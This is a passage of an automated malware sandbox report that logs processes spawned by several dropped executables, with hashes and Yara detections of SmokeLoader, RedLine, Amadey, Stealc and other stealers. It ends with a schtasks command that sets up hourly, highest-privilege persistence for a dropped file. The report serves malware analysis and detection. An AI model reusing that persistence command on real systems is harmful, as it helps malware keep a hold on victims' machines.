                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Clipboard_Hijacker_5, Description: Yara detected Clipboard Hijacker, Source: 00000008.00000002.2952837551.0000000001409000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:9
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\5Hyf8PuolQS_j4ZkhvHWpkWr.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:418'816 bytes
                                                                                                                                                                                                                                MD5 hash:2F59FBD6623872FBDC2F63D18023BFDA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2601636491.0000000002600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000009.00000002.2601921421.000000000283E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000009.00000002.2601604235.00000000025F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000009.00000002.2601573090.0000000002561000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:10
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\aFBKY19rLrQU72E14du4WCPo.exe
                                                                                                                                                                                                                                Imagebase:0x1b0000
                                                                                                                                                                                                                                File size:3'141'632 bytes
                                                                                                                                                                                                                                MD5 hash:1FEDF314D7C5ED06FF6833C9C8FE5441
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:11
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\g2v2mVtOHdxh9ZgrtYde5yf0.exe
                                                                                                                                                                                                                                Imagebase:0xa90000
                                                                                                                                                                                                                                File size:361'336 bytes
                                                                                                                                                                                                                                MD5 hash:D687AF3B103399AA245807BB719878B7
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2116924327.0000000003F55000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:12
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\kJHbagG0C4H5BEyYJQeInLfF.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:3'037'032 bytes
                                                                                                                                                                                                                                MD5 hash:098E15E88E5332253356C78BADF8D479
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2392167583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000C.00000002.2391461087.00000000005CA000.00000040.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:13
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\wg6F73wLMGz6xXFA14w_olCU.exe
                                                                                                                                                                                                                                Imagebase:0xa0000
                                                                                                                                                                                                                                File size:331'640 bytes
                                                                                                                                                                                                                                MD5 hash:E8E6CD9EC48FAFCCC174F7BF07D045E2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000D.00000002.2359247420.0000000003345000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:14
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\1IvCzYfqoD3SHvKt45m1rbHu.exe
                                                                                                                                                                                                                                Imagebase:0x610000
                                                                                                                                                                                                                                File size:423'328 bytes
                                                                                                                                                                                                                                MD5 hash:A463E516041F4BC84F03BC8FE2B643DD
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:15
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                Imagebase:0xe20000
                                                                                                                                                                                                                                File size:4'249'600 bytes
                                                                                                                                                                                                                                MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:16
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\VkcBn13x2kmdo9AMRXP8qT_4.exe
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:3'129'722 bytes
                                                                                                                                                                                                                                MD5 hash:1905889C50091A12A2B3A94E525A3566
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:17
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\hd4YBtMwCrxG4M3aLLza89vv.exe
                                                                                                                                                                                                                                Imagebase:0xf60000
                                                                                                                                                                                                                                File size:222'112 bytes
                                                                                                                                                                                                                                MD5 hash:EA754070163F8ECA914B259096D834F0
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:18
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\iXbjjIcri3rG3XH6GK7dHSLO.exe
                                                                                                                                                                                                                                Imagebase:0x7ff750520000
                                                                                                                                                                                                                                File size:22'487'040 bytes
                                                                                                                                                                                                                                MD5 hash:CB3952F1852179348F8D2DB91760D03B
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:Go lang
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000012.00000000.1791538975.00007FF75157B000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                • Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000012.00000002.2923275259.00007FF75157B000.00000002.00000001.01000000.00000014.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:19
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Users\user\Documents\iofolko5\_U2YDEzm5f5t9soM_Qc1Hc4U.exe
                                                                                                                                                                                                                                Imagebase:0x140000000
                                                                                                                                                                                                                                File size:11'496'960 bytes
                                                                                                                                                                                                                                MD5 hash:D60D266E8FBDBD7794653ECF2ABA26ED
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:20
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:21
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:22
                                                                                                                                                                                                                                Start time:07:34:00
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:23
                                                                                                                                                                                                                                Start time:07:34:01
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:24
                                                                                                                                                                                                                                Start time:07:34:02
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                                                                                Imagebase:0x7ff77afe0000
                                                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:25
                                                                                                                                                                                                                                Start time:07:34:03
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 6948 -ip 6948
                                                                                                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:26
                                                                                                                                                                                                                                Start time:07:34:03
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                Imagebase:0x9b0000
                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:27
                                                                                                                                                                                                                                Start time:07:34:03
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                Imagebase:0x9f0000
                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001B.00000002.2207772758.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:28
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                Imagebase:0xd30000
                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:29
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6948 -s 876
                                                                                                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:30
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"
                                                                                                                                                                                                                                Imagebase:0x3e0000
                                                                                                                                                                                                                                File size:4'249'600 bytes
                                                                                                                                                                                                                                MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:31
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2796 -ip 2796
                                                                                                                                                                                                                                Imagebase:0x7ff6fab70000
                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:32
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"
                                                                                                                                                                                                                                Imagebase:0x310000
                                                                                                                                                                                                                                File size:4'249'600 bytes
                                                                                                                                                                                                                                MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:33
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                                                                                                                                                                Imagebase:0xf60000
                                                                                                                                                                                                                                File size:65'440 bytes
                                                                                                                                                                                                                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000021.00000002.1899246450.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:34
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1708 -ip 1708
                                                                                                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:07:34:05
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\Documents\iofolko5\XO9lsdL5g6aUibu31TDcoBrI.exe"
                                                                                                                                                                                                                                Imagebase:0xf20000
                                                                                                                                                                                                                                File size:4'249'600 bytes
                                                                                                                                                                                                                                MD5 hash:ABDBCC23BD8F767E671BAC6D2FF60335
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:07:34:06
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                Imagebase:0x7ff70f010000
                                                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:07:34:06
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1708 -s 548
                                                                                                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:38
                                                                                                                                                                                                                                Start time:07:34:06
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2796 -s 944
                                                                                                                                                                                                                                Imagebase:0x6b0000
                                                                                                                                                                                                                                File size:483'680 bytes
                                                                                                                                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:39
                                                                                                                                                                                                                                Start time:07:34:07
                                                                                                                                                                                                                                Start date:21/09/2024
                                                                                                                                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:schtasks /create /f /RU "user" /tr "C:\ProgramData\jewkkwnf\jewkkwnf.exe" /tn "jewkkwnf HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                                Imagebase:0x5b0000
                                                                                                                                                                                                                                File size:187'904 bytes
                                                                                                                                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                                                                                                                                Has elevated privileges:true
